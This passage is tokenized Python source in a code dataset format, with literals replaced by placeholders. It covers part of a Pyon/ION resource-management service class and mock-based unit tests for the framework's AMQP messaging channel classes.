warn ( "<STR_LIT>" , association_predicate , res_type ) <EOL> return assoc_list <EOL> def _find_associations ( self , resource_id , predicate , target_type = None , backward = False ) : <EOL> """<STR_LIT>""" <EOL> assoc_list = [ ] <EOL> if backward : <EOL> by_object = self . ctx [ '<STR_LIT>' ] . get ( ( resource_id , predicate ) , [ ] ) <EOL> assoc_list . extend ( [ ( assoc . s , assoc ) for assoc in by_object if not target_type or assoc . st in target_type ] ) <EOL> else : <EOL> by_subject = self . ctx [ '<STR_LIT>' ] . get ( ( resource_id , predicate ) , [ ] ) <EOL> assoc_list . extend ( [ ( assoc . o , assoc ) for assoc in by_subject if not target_type or assoc . ot in target_type ] ) <EOL> return assoc_list <EOL> def execute_method_with_resource ( self , resource_id , method_name , ** kwargs ) : <EOL> try : <EOL> args = [ resource_id ] <EOL> return execute_method ( self , method_name , * args , ** kwargs ) <EOL> except Unauthorized : <EOL> pass <EOL> except Exception , e : <EOL> log . error ( '<STR_LIT>' % ( method_name , resource_id , str ( e ) ) ) <EOL> return None <EOL> def create_prepare_resource_support ( self , resource_id = "<STR_LIT>" , prepare_resource_type = None , origin_resource_type = None ) : <EOL> if not isinstance ( resource_id , types . StringType ) : <EOL> raise Inconsistent ( "<STR_LIT>" ) <EOL> if not self . service_provider or not self . _rr : <EOL> raise Inconsistent ( "<STR_LIT>" ) <EOL> if prepare_resource_type is not None and prepare_resource_type not in getextends ( OT . ResourcePrepareSupport ) : <EOL> raise BadRequest ( '<STR_LIT>' % ( prepare_resource_type , OT . ResourcePrepareSupport ) ) <EOL> resource_data = IonObject ( prepare_resource_type ) <EOL> origin_resource_decorator = resource_data . 
get_class_decorator_value ( '<STR_LIT>' ) <EOL> if origin_resource_decorator is None and origin_resource_type is None : <EOL> raise NotFound ( '<STR_LIT>' , prepare_resource_type ) <EOL> origin_resource_type = origin_resource_type if origin_resource_type is not None else origin_resource_decorator <EOL> if origin_resource_type is None : <EOL> raise NotFound ( '<STR_LIT>' , prepare_resource_type ) <EOL> resource_object = None <EOL> if resource_id : <EOL> resource_object = self . _rr . read ( resource_id ) <EOL> if origin_resource_type != resource_object . type_ and not issubtype ( resource_object . type_ , origin_resource_type ) : <EOL> raise Inconsistent ( '<STR_LIT>' % ( <EOL> prepare_resource_type , origin_resource_type , resource_object . type_ ) ) <EOL> resource_data . _id = resource_object . _id <EOL> else : <EOL> resource_object = IonObject ( origin_resource_type ) <EOL> resource_data . resource = resource_object <EOL> resource_data . resource_schema = get_object_schema ( origin_resource_type ) <EOL> for field in resource_data . _schema : <EOL> deco_value = resource_data . get_decorator_value ( field , '<STR_LIT>' ) <EOL> assoc_dict = { } <EOL> if deco_value is not None : <EOL> if deco_value . find ( '<STR_LIT:U+002C>' ) == - <NUM_LIT:1> : <EOL> associated_resources = [ deco_value ] <EOL> else : <EOL> associated_resources = deco_value . split ( '<STR_LIT:U+002C>' ) <EOL> for res in associated_resources : <EOL> assoc = self . get_associated_resource_info ( origin_resource_type , resource_id , res ) <EOL> assoc_dict [ assoc . key ] = assoc <EOL> setattr ( resource_data , field , assoc_dict ) <EOL> continue <EOL> return resource_data <EOL> def get_associated_resource_info ( self , origin_resource_type = "<STR_LIT>" , resource_id = "<STR_LIT>" , assoc_resource_type = None ) : <EOL> if not origin_resource_type : <EOL> raise Inconsistent ( "<STR_LIT>" ) <EOL> if not isinstance ( resource_id , types . 
StringType ) : <EOL> raise Inconsistent ( "<STR_LIT>" ) <EOL> if not self . service_provider or not self . _rr : <EOL> raise Inconsistent ( "<STR_LIT>" ) <EOL> if assoc_resource_type is not None and assoc_resource_type not in getextends ( OT . AssociatedResources ) : <EOL> raise BadRequest ( '<STR_LIT>' % ( assoc_resource_type , OT . AssociatedResources ) ) <EOL> resource_data = IonObject ( assoc_resource_type ) <EOL> log . debug ( "<STR_LIT>" , assoc_resource_type ) <EOL> for field in resource_data . _schema : <EOL> deco_value = resource_data . get_decorator_value ( field , '<STR_LIT>' ) <EOL> if deco_value is not None : <EOL> setattr ( resource_data , '<STR_LIT>' , deco_value ) <EOL> res_list , _ = self . _rr . find_resources ( restype = deco_value , id_only = False ) <EOL> exclude_lcs_filter_value = resource_data . get_decorator_value ( field , '<STR_LIT>' ) <EOL> if exclude_lcs_filter_value is not None and exclude_lcs_filter_value . find ( '<STR_LIT:U+002C>' ) > - <NUM_LIT:1> : <EOL> exclude_filter = exclude_lcs_filter_value . split ( '<STR_LIT:U+002C>' ) <EOL> res_list = [ res for res in res_list if res . lcstate not in exclude_filter ] <EOL> res_filter_value = resource_data . get_decorator_value ( field , '<STR_LIT>' ) <EOL> if res_filter_value is not None and res_filter_value . find ( '<STR_LIT:U+002C>' ) > - <NUM_LIT:1> : <EOL> assoc_filter = res_filter_value . split ( '<STR_LIT:U+002C>' ) <EOL> res_associations = self . _rr . find_associations ( predicate = assoc_filter [ <NUM_LIT:1> ] , id_only = False ) <EOL> assoc_list = [ a for a in res_associations if a . st == assoc_filter [ <NUM_LIT:0> ] and a . ot == assoc_filter [ <NUM_LIT:2> ] ] <EOL> def resource_available ( res ) : <EOL> rel_assocs = [ a for a in assoc_list if res . _id == ( a . o if a . st == origin_resource_type else a . s ) ] <EOL> assocs = [ ( a . s if a . st == origin_resource_type else a . 
o ) for a in rel_assocs ] <EOL> return len ( assocs ) == <NUM_LIT:0> or resource_id in assocs <EOL> final_list = [ ] <EOL> final_list . extend ( [ res for res in res_list if resource_available ( res ) ] ) <EOL> setattr ( resource_data , field , final_list ) <EOL> else : <EOL> setattr ( resource_data , field , res_list ) <EOL> continue <EOL> deco_value = resource_data . get_decorator_value ( field , '<STR_LIT>' ) <EOL> if deco_value is not None : <EOL> if not resource_id and ( resource_data . is_decorator ( field , '<STR_LIT>' ) or <EOL> resource_data . is_decorator ( field , '<STR_LIT>' ) ) : <EOL> continue <EOL> resource_sub = resource_id if resource_data . is_decorator ( field , '<STR_LIT>' ) else None <EOL> resource_obj = resource_id if resource_data . is_decorator ( field , '<STR_LIT>' ) else None <EOL> assoc_list = self . _rr . find_associations ( subject = resource_sub , predicate = deco_value , object = resource_obj , id_only = False ) <EOL> subject_type = resource_data . get_decorator_value ( field , '<STR_LIT>' ) <EOL> if subject_type is not None : <EOL> assoc_list = [ assoc for assoc in assoc_list if ( assoc . st == subject_type ) ] <EOL> object_type = resource_data . get_decorator_value ( field , '<STR_LIT>' ) <EOL> if object_type is not None : <EOL> assoc_list = [ assoc for assoc in assoc_list if ( assoc . ot == object_type ) ] <EOL> setattr ( resource_data , field , assoc_list ) <EOL> continue <EOL> key = resource_data . get_class_decorator_value ( '<STR_LIT>' ) <EOL> if key is None : <EOL> resource_data . key = resource_data . resource_type <EOL> else : <EOL> resource_data . key = key <EOL> return resource_data <EOL> def set_service_requests ( self , service_request = None , service_name = '<STR_LIT>' , service_operation = '<STR_LIT>' , request_parameters = None ) : <EOL> assert ( service_request ) <EOL> assert ( service_name ) <EOL> assert ( service_operation ) <EOL> assert ( request_parameters ) <EOL> service_request . 
service_name = service_name <EOL> service_request . service_operation = service_operation <EOL> service_request . request_parameters = request_parameters if request_parameters is not None else { } <EOL> return </s>
<s> __author__ = '<STR_LIT>' <EOL> from mock import Mock , sentinel , patch , MagicMock <EOL> from gevent . event import Event <EOL> from gevent import spawn <EOL> from gevent . queue import Queue <EOL> import Queue as PQueue <EOL> import time <EOL> from nose . plugins . attrib import attr <EOL> from pyon . util . unit_test import PyonTestCase <EOL> from pyon . core import bootstrap <EOL> from pyon . core . bootstrap import CFG <EOL> from pyon . net . channel import BaseChannel , SendChannel , RecvChannel , BidirClientChannel , SubscriberChannel , ChannelClosedError , ServerChannel , ChannelError , ChannelShutdownMessage , ListenChannel , PublisherChannel <EOL> from pyon . net . transport import NameTrio , BaseTransport , AMQPTransport <EOL> from pyon . util . int_test import IonIntegrationTestCase <EOL> @ attr ( '<STR_LIT>' ) <EOL> class TestBaseChannel ( PyonTestCase ) : <EOL> def test_init ( self ) : <EOL> ch = BaseChannel ( ) <EOL> self . assertIsNone ( ch . _close_callback ) <EOL> ch = BaseChannel ( close_callback = sentinel . closecb ) <EOL> self . assertEquals ( ch . _close_callback , sentinel . closecb ) <EOL> def test_declare_exchange_point ( self ) : <EOL> ch = BaseChannel ( ) <EOL> self . assertRaises ( AssertionError , ch . _declare_exchange , None ) <EOL> transport = Mock ( ) <EOL> ch . on_channel_open ( transport ) <EOL> ch . _declare_exchange ( '<STR_LIT:hello>' ) <EOL> self . assertTrue ( transport . declare_exchange_impl . called ) <EOL> self . assertIn ( '<STR_LIT:hello>' , transport . declare_exchange_impl . call_args [ <NUM_LIT:0> ] ) <EOL> self . assertIn ( '<STR_LIT>' , transport . declare_exchange_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , transport . declare_exchange_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , transport . declare_exchange_impl . 
call_args [ <NUM_LIT:1> ] ) <EOL> @ patch ( '<STR_LIT>' , Mock ( ) ) <EOL> def test_close ( self ) : <EOL> transport = Mock ( ) <EOL> ch = BaseChannel ( ) <EOL> ch . on_channel_open ( transport ) <EOL> ch . _fsm . current_state = ch . S_ACTIVE <EOL> ch . close ( ) <EOL> transport . close . assert_called_once_with ( ) <EOL> def test_close_with_callback ( self ) : <EOL> cbmock = Mock ( ) <EOL> ch = BaseChannel ( close_callback = cbmock ) <EOL> ch . _fsm . current_state = ch . S_ACTIVE <EOL> ch . close ( ) <EOL> cbmock . assert_called_once_with ( ch ) <EOL> def test_on_channel_open ( self ) : <EOL> ch = BaseChannel ( ) <EOL> transport = Mock ( ) <EOL> ch . on_channel_open ( transport ) <EOL> transport . add_on_close_callback . assert_called_once_with ( ch . on_channel_close ) <EOL> self . assertEquals ( ch . _transport , transport ) <EOL> def test_on_channel_close ( self ) : <EOL> ch = BaseChannel ( ) <EOL> ch . on_channel_open ( Mock ( ) ) <EOL> ch . _transport . channel_number = <NUM_LIT:1> <EOL> ch . on_channel_close ( ch , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> self . assertIsNone ( ch . _transport ) <EOL> def test_on_channel_closed_with_error_callback ( self ) : <EOL> ch = BaseChannel ( ) <EOL> ch . on_channel_open ( Mock ( ) ) <EOL> ch . _transport . channel_number = <NUM_LIT:1> <EOL> closemock = Mock ( ) <EOL> ch . set_closed_error_callback ( closemock ) <EOL> ch . on_channel_close ( ch , <NUM_LIT:1> , '<STR_LIT>' ) <EOL> closemock . assert_called_once_with ( ch , <NUM_LIT:1> , '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_on_channel_close_with_error_in_error_callback ( self , logmock ) : <EOL> ch = BaseChannel ( ) <EOL> ch . on_channel_open ( Mock ( ) ) <EOL> ch . _transport . channel_number = <NUM_LIT:1> <EOL> closemock = Mock ( ) <EOL> closemock . side_effect = StandardError <EOL> ch . set_closed_error_callback ( closemock ) <EOL> ch . on_channel_close ( ch , <NUM_LIT:1> , '<STR_LIT>' ) <EOL> self . assertEquals ( logmock . warn . 
call_count , <NUM_LIT:1> ) <EOL> def test_get_channel_id ( self ) : <EOL> ch = BaseChannel ( ) <EOL> self . assertTrue ( ch . get_channel_id ( ) is None ) <EOL> ch . on_channel_open ( Mock ( ) ) <EOL> self . assertEquals ( ch . get_channel_id ( ) , ch . _transport . channel_number ) <EOL> def test__ensure_transport ( self ) : <EOL> ch = BaseChannel ( ) <EOL> with self . assertRaises ( ChannelError ) : <EOL> with ch . _ensure_transport ( ) : <EOL> pass <EOL> @ attr ( '<STR_LIT>' ) <EOL> class TestSendChannel ( PyonTestCase ) : <EOL> def setUp ( self ) : <EOL> self . ch = SendChannel ( ) <EOL> def test_connect ( self ) : <EOL> self . ch . connect ( NameTrio ( '<STR_LIT>' , '<STR_LIT:key>' ) ) <EOL> self . assertTrue ( hasattr ( self . ch . _send_name , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( self . ch . _send_name , '<STR_LIT>' ) ) <EOL> self . assertEquals ( self . ch . _send_name . exchange , '<STR_LIT>' ) <EOL> self . assertEquals ( self . ch . _send_name . queue , '<STR_LIT:key>' ) <EOL> self . assertEquals ( self . ch . _exchange , '<STR_LIT>' ) <EOL> def test_send ( self ) : <EOL> _sendmock = Mock ( ) <EOL> self . ch . _send = _sendmock <EOL> np = NameTrio ( '<STR_LIT>' , '<STR_LIT:key>' ) <EOL> self . ch . connect ( np ) <EOL> self . ch . send ( '<STR_LIT:data>' , { '<STR_LIT>' : sentinel . headervalue } ) <EOL> _sendmock . assert_called_once_with ( np , '<STR_LIT:data>' , headers = { '<STR_LIT>' : sentinel . headervalue } ) <EOL> def test__send ( self ) : <EOL> transport = Mock ( ) <EOL> transport . channel_number = sentinel . channel_number <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . _send ( NameTrio ( '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertTrue ( transport . publish_impl . called ) <EOL> self . assertIn ( '<STR_LIT>' , transport . publish_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , transport . publish_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . 
assertIn ( '<STR_LIT:body>' , transport . publish_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , transport . publish_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , transport . publish_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , transport . publish_impl . call_args [ <NUM_LIT:1> ] ) <EOL> props = transport . publish_impl . call_args [ <NUM_LIT:1> ] . get ( '<STR_LIT>' ) <EOL> self . assertEquals ( props , { } ) <EOL> self . ch . _send ( NameTrio ( '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' , headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> props = transport . publish_impl . call_args [ <NUM_LIT:1> ] . get ( '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , props ) <EOL> self . assertEquals ( props [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> @ attr ( '<STR_LIT>' ) <EOL> class TestRecvChannel ( PyonTestCase ) : <EOL> def setUp ( self ) : <EOL> self . ch = RecvChannel ( ) <EOL> def _create_channel ( self ) : <EOL> """<STR_LIT>""" <EOL> ch = RecvChannel ( ) <EOL> ch . _declare_exchange = Mock ( ) <EOL> ch . _declare_queue = Mock ( ) <EOL> ch . _declare_queue . return_value = sentinel . anon_queue <EOL> ch . _bind = Mock ( ) <EOL> return ch <EOL> def test_setup_listener ( self ) : <EOL> mxp = Mock ( ) <EOL> mdq = Mock ( ) <EOL> mdq . return_value = sentinel . anon_queue <EOL> mb = Mock ( ) <EOL> def create_channel ( ) : <EOL> ch = RecvChannel ( ) <EOL> ch . _declare_exchange = mxp <EOL> ch . _declare_queue = mdq <EOL> ch . _bind = mb <EOL> return ch <EOL> ch = create_channel ( ) <EOL> self . assertFalse ( ch . _setup_listener_called ) <EOL> ch . setup_listener ( NameTrio ( sentinel . xp , sentinel . queue , sentinel . binding ) ) <EOL> self . assertTrue ( hasattr ( ch , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( ch . _recv_name , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( ch . _recv_name , '<STR_LIT>' ) ) <EOL> self . assertEquals ( ch . _recv_name . exchange , sentinel . 
xp ) <EOL> self . assertEquals ( ch . _recv_name . queue , sentinel . queue ) <EOL> mxp . assert_called_once_with ( sentinel . xp ) <EOL> mdq . assert_called_once_with ( sentinel . queue ) <EOL> mb . assert_called_once_with ( sentinel . binding ) <EOL> self . assertTrue ( ch . _setup_listener_called ) <EOL> ch . setup_listener ( NameTrio ( sentinel . xp2 , sentinel . queue2 ) ) <EOL> self . assertTrue ( hasattr ( ch . _recv_name , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( ch . _recv_name , '<STR_LIT>' ) ) <EOL> self . assertEquals ( ch . _recv_name . exchange , sentinel . xp ) <EOL> self . assertEquals ( ch . _recv_name . queue , sentinel . queue ) <EOL> mxp . assert_called_once_with ( sentinel . xp ) <EOL> mdq . assert_called_once_with ( sentinel . queue ) <EOL> mb . assert_called_once_with ( sentinel . binding ) <EOL> ch = create_channel ( ) <EOL> ch . setup_listener ( NameTrio ( sentinel . xp2 , sentinel . queue2 ) , binding = sentinel . binding ) <EOL> mxp . assert_called_with ( sentinel . xp2 ) <EOL> mdq . assert_called_with ( sentinel . queue2 ) <EOL> mb . assert_called_with ( sentinel . binding ) <EOL> ch = create_channel ( ) <EOL> ch . setup_listener ( NameTrio ( sentinel . xp3 ) ) <EOL> mxp . assert_called_with ( sentinel . xp3 ) <EOL> mdq . assert_called_with ( None ) <EOL> mb . assert_called_with ( sentinel . anon_queue ) <EOL> ch = create_channel ( ) <EOL> ch . setup_listener ( NameTrio ( sentinel . xp4 ) , binding = sentinel . binding2 ) <EOL> mxp . assert_called_with ( sentinel . xp4 ) <EOL> mdq . assert_called_with ( None ) <EOL> mb . assert_called_with ( sentinel . binding2 ) <EOL> def test_setup_listener_existing_recv_name ( self ) : <EOL> ch = self . _create_channel ( ) <EOL> recv_name = NameTrio ( sentinel . xp , sentinel . queue , sentinel . binding ) <EOL> ch . _recv_name = recv_name <EOL> ch . setup_listener ( ) <EOL> self . assertEquals ( ch . 
_recv_name , recv_name ) <EOL> def test_setup_listener_existing_recv_name_with_differing_name ( self ) : <EOL> ch = self . _create_channel ( ) <EOL> recv_name = NameTrio ( sentinel . xp , sentinel . queue , sentinel . binding ) <EOL> ch . _recv_name = recv_name <EOL> ch . setup_listener ( name = NameTrio ( sentinel . xp , sentinel . queue , sentinel . notbinding ) ) <EOL> self . assertNotEquals ( ch . _recv_name , recv_name ) <EOL> self . assertEquals ( ch . _recv_name . exchange , sentinel . xp ) <EOL> self . assertEquals ( ch . _recv_name . queue , sentinel . queue ) <EOL> self . assertEquals ( ch . _recv_name . binding , sentinel . notbinding ) <EOL> def test__destroy_queue_no_recv_name ( self ) : <EOL> self . assertRaises ( AssertionError , self . ch . destroy_listener ) <EOL> def test__destroy_queue ( self ) : <EOL> self . ch . _recv_name = NameTrio ( sentinel . xp , sentinel . queue ) <EOL> self . ch . on_channel_open ( Mock ( BaseTransport ) ) <EOL> self . ch . destroy_listener ( ) <EOL> self . assertTrue ( self . ch . _transport . delete_queue_impl . called ) <EOL> self . assertIn ( '<STR_LIT>' , self . ch . _transport . delete_queue_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( sentinel . queue , self . ch . _transport . delete_queue_impl . call_args [ <NUM_LIT:1> ] . itervalues ( ) ) <EOL> def test_destroy_listener ( self ) : <EOL> m = Mock ( ) <EOL> self . ch . _destroy_queue = m <EOL> self . ch . destroy_listener ( ) <EOL> m . assert_called_once_with ( ) <EOL> def test__destroy_binding_no_recv_name_or_binding ( self ) : <EOL> self . assertRaises ( AssertionError , self . ch . _destroy_binding ) <EOL> def test__destroy_binding ( self ) : <EOL> self . ch . _recv_name = NameTrio ( sentinel . xp , sentinel . queue ) <EOL> self . ch . _recv_binding = sentinel . binding <EOL> self . ch . on_channel_open ( Mock ( BaseTransport ) ) <EOL> self . ch . _destroy_binding ( ) <EOL> self . assertTrue ( self . ch . _transport . unbind_impl . 
called ) <EOL> self . assertIn ( '<STR_LIT>' , self . ch . _transport . unbind_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , self . ch . _transport . unbind_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , self . ch . _transport . unbind_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( sentinel . queue , self . ch . _transport . unbind_impl . call_args [ <NUM_LIT:1> ] . itervalues ( ) ) <EOL> self . assertIn ( sentinel . xp , self . ch . _transport . unbind_impl . call_args [ <NUM_LIT:1> ] . itervalues ( ) ) <EOL> self . assertIn ( sentinel . binding , self . ch . _transport . unbind_impl . call_args [ <NUM_LIT:1> ] . itervalues ( ) ) <EOL> def test_start_consume ( self ) : <EOL> transport = MagicMock ( ) <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . _fsm . current_state = self . ch . S_ACTIVE <EOL> transport . start_consume_impl . return_value = sentinel . consumer_tag <EOL> self . ch . _recv_name = NameTrio ( sentinel . xp , sentinel . queue ) <EOL> self . ch . start_consume ( ) <EOL> self . assertTrue ( self . ch . _consuming ) <EOL> self . assertEquals ( self . ch . _fsm . current_state , self . ch . S_ACTIVE ) <EOL> self . assertEquals ( self . ch . _consumer_tag , sentinel . consumer_tag ) <EOL> transport . start_consume_impl . assert_called_once_with ( self . ch . _on_deliver , queue = sentinel . queue , no_ack = self . ch . _consumer_no_ack , exclusive = self . ch . _consumer_exclusive ) <EOL> def test_start_consume_already_started ( self ) : <EOL> self . ch . _on_start_consume = Mock ( ) <EOL> self . ch . _consuming = True <EOL> self . ch . start_consume ( ) <EOL> self . assertFalse ( self . ch . _on_start_consume . called ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_start_consume_with_consumer_tag_and_auto_delete ( self , mocklog ) : <EOL> transport = AMQPTransport ( Mock ( ) ) <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . _fsm . current_state = self . 
ch . S_ACTIVE <EOL> self . ch . _recv_name = NameTrio ( sentinel . xp , sentinel . queue ) <EOL> self . ch . _consumer_tag = sentinel . consumer_tag <EOL> self . ch . _queue_auto_delete = True <EOL> self . ch . start_consume ( ) <EOL> self . assertTrue ( mocklog . warn . called ) <EOL> def test_stop_consume ( self ) : <EOL> transport = MagicMock ( ) <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . _fsm . current_state = self . ch . S_ACTIVE <EOL> self . ch . _consuming = True <EOL> self . ch . _consumer_tag = sentinel . consumer_tag <EOL> self . ch . stop_consume ( ) <EOL> self . assertEquals ( self . ch . _fsm . current_state , self . ch . S_ACTIVE ) <EOL> self . assertFalse ( self . ch . _consuming ) <EOL> self . assertTrue ( transport . stop_consume_impl . called ) <EOL> self . assertIn ( sentinel . consumer_tag , transport . stop_consume_impl . call_args [ <NUM_LIT:0> ] ) <EOL> def test_stop_consume_havent_started ( self ) : <EOL> self . ch . _on_stop_consume = Mock ( ) <EOL> self . ch . stop_consume ( ) <EOL> self . assertFalse ( self . ch . _on_stop_consume . called ) <EOL> def test_stop_consume_raises_warning_with_auto_delete ( self ) : <EOL> transport = AMQPTransport ( Mock ( ) ) <EOL> transport . stop_consume_impl = Mock ( ) <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . _consumer_tag = sentinel . consumer_tag <EOL> self . ch . _recv_name = NameTrio ( sentinel . ex , sentinel . queue , sentinel . binding ) <EOL> self . ch . _fsm . current_state = self . ch . S_ACTIVE <EOL> self . ch . _consuming = True <EOL> self . ch . _queue_auto_delete = True <EOL> self . ch . stop_consume ( ) <EOL> self . assertTrue ( self . ch . _transport . stop_consume_impl . called ) <EOL> self . assertIn ( self . ch . _consumer_tag , self . ch . _transport . stop_consume_impl . call_args [ <NUM_LIT:0> ] ) <EOL> def test_recv ( self ) : <EOL> rqmock = Mock ( spec = RecvChannel . SizeNotifyQueue ) <EOL> self . ch . 
_recv_queue = rqmock <EOL> rqmock . get . return_value = sentinel . recv <EOL> m = self . ch . recv ( ) <EOL> self . assertEquals ( m , sentinel . recv ) <EOL> self . assertTrue ( rqmock . get . called ) <EOL> def test_recv_shutdown ( self ) : <EOL> rqmock = Mock ( spec = RecvChannel . SizeNotifyQueue ) <EOL> self . ch . _recv_queue = rqmock <EOL> rqmock . get . return_value = ChannelShutdownMessage ( ) <EOL> self . assertRaises ( ChannelClosedError , self . ch . recv ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' , Mock ( ) ) <EOL> def test_close_impl ( self , mockshutdown , mockbasechannel ) : <EOL> mockrq = Mock ( spec = RecvChannel . SizeNotifyQueue ) <EOL> self . ch . _recv_queue = mockrq <EOL> self . ch . close_impl ( ) <EOL> mockshutdown . assert_called_once_with ( ) <EOL> mockrq . put . assert_called_once_with ( mockshutdown ( ) ) <EOL> mockbasechannel . close_impl . assert_called_once_with ( self . ch ) <EOL> def test_declare_queue ( self ) : <EOL> self . ch . on_channel_open ( Mock ( BaseTransport ) ) <EOL> self . ch . _recv_name = ( NameTrio ( str ( sentinel . xp ) ) ) <EOL> qd = self . ch . _declare_queue ( str ( sentinel . queue ) ) <EOL> self . assertTrue ( self . ch . _transport . declare_queue_impl . called ) <EOL> self . assertIn ( '<STR_LIT>' , self . ch . _transport . declare_queue_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , self . ch . _transport . declare_queue_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , self . ch . _transport . declare_queue_impl . call_args [ <NUM_LIT:1> ] ) <EOL> composed = "<STR_LIT:.>" . join ( [ str ( sentinel . xp ) , str ( sentinel . queue ) ] ) <EOL> self . assertIn ( composed , self . ch . _transport . declare_queue_impl . call_args [ <NUM_LIT:1> ] . itervalues ( ) ) <EOL> self . assertIn ( self . ch . queue_auto_delete , self . ch . _transport . declare_queue_impl . call_args [ <NUM_LIT:1> ] . 
itervalues ( ) ) <EOL> self . assertIn ( self . ch . queue_durable , self . ch . _transport . declare_queue_impl . call_args [ <NUM_LIT:1> ] . itervalues ( ) ) <EOL> self . assertTrue ( hasattr ( self . ch . _recv_name , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( self . ch . _recv_name , '<STR_LIT>' ) ) <EOL> self . assertEquals ( self . ch . _recv_name . exchange , str ( sentinel . xp ) ) <EOL> self . assertEquals ( self . ch . _recv_name . queue , self . ch . _transport . declare_queue_impl ( ) ) <EOL> self . assertEquals ( qd , self . ch . _transport . declare_queue_impl ( ) ) <EOL> def test__bind_no_name ( self ) : <EOL> self . assertRaises ( AssertionError , self . ch . _bind , sentinel . binding ) <EOL> def test__bind ( self ) : <EOL> self . ch . _recv_name = NameTrio ( sentinel . xp , sentinel . queue ) <EOL> self . ch . on_channel_open ( Mock ( ) ) <EOL> self . ch . _bind ( sentinel . binding ) <EOL> self . assertTrue ( self . ch . _transport . bind_impl . called ) <EOL> self . assertIn ( '<STR_LIT>' , self . ch . _transport . bind_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , self . ch . _transport . bind_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , self . ch . _transport . bind_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( sentinel . queue , self . ch . _transport . bind_impl . call_args [ <NUM_LIT:1> ] . itervalues ( ) ) <EOL> self . assertIn ( sentinel . xp , self . ch . _transport . bind_impl . call_args [ <NUM_LIT:1> ] . itervalues ( ) ) <EOL> self . assertIn ( sentinel . binding , self . ch . _transport . bind_impl . call_args [ <NUM_LIT:1> ] . itervalues ( ) ) <EOL> def test__on_deliver ( self ) : <EOL> m = Mock ( ) <EOL> m . consumer_tag = sentinel . consumer_tag <EOL> m . delivery_tag = sentinel . delivery_tag <EOL> m . redelivered = sentinel . redelivered <EOL> m . exchange = sentinel . exchange <EOL> m . routing_key = sentinel . routing_key <EOL> h = Mock ( ) <EOL> h . 
headers = { '<STR_LIT>' : sentinel . exists } <EOL> rqmock = Mock ( spec = RecvChannel . SizeNotifyQueue ) <EOL> self . ch . _recv_queue = rqmock <EOL> self . ch . _on_deliver ( sentinel . chan , m , h , sentinel . body ) <EOL> rqmock . put . assert_called_once_with ( ( sentinel . body , h . headers , sentinel . delivery_tag ) ) <EOL> self . assertIn ( sentinel . exists , rqmock . put . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] . itervalues ( ) ) <EOL> def test_ack ( self ) : <EOL> transport = Mock ( ) <EOL> transport . channel_number = sentinel . channel_number <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . ack ( sentinel . delivery_tag ) <EOL> transport . ack_impl . assert_called_once_with ( sentinel . delivery_tag ) <EOL> def test_reject ( self ) : <EOL> transport = Mock ( ) <EOL> transport . channel_number = sentinel . channel_number <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . reject ( sentinel . delivery_tag , requeue = True ) <EOL> transport . reject_impl . assert_called_once_with ( sentinel . delivery_tag , requeue = True ) <EOL> def test_reset ( self ) : <EOL> self . ch . reset ( ) <EOL> self . assertEquals ( self . ch . _fsm . current_state , self . ch . S_INIT ) <EOL> def test_reset_when_consuming ( self ) : <EOL> transport = MagicMock ( ) <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . _fsm . current_state = self . ch . S_ACTIVE <EOL> self . ch . _consuming = True <EOL> self . ch . _consumer_tag = sentinel . consumer_tag <EOL> self . ch . reset ( ) <EOL> self . assertEquals ( self . ch . _fsm . current_state , self . ch . S_ACTIVE ) <EOL> self . assertTrue ( transport . stop_consume_impl . called ) <EOL> def test_get_stats ( self ) : <EOL> transport = Mock ( ) <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . _recv_name = NameTrio ( sentinel . ex , sentinel . queue ) <EOL> self . ch . get_stats ( ) <EOL> self . ch . _transport . get_stats_impl . 
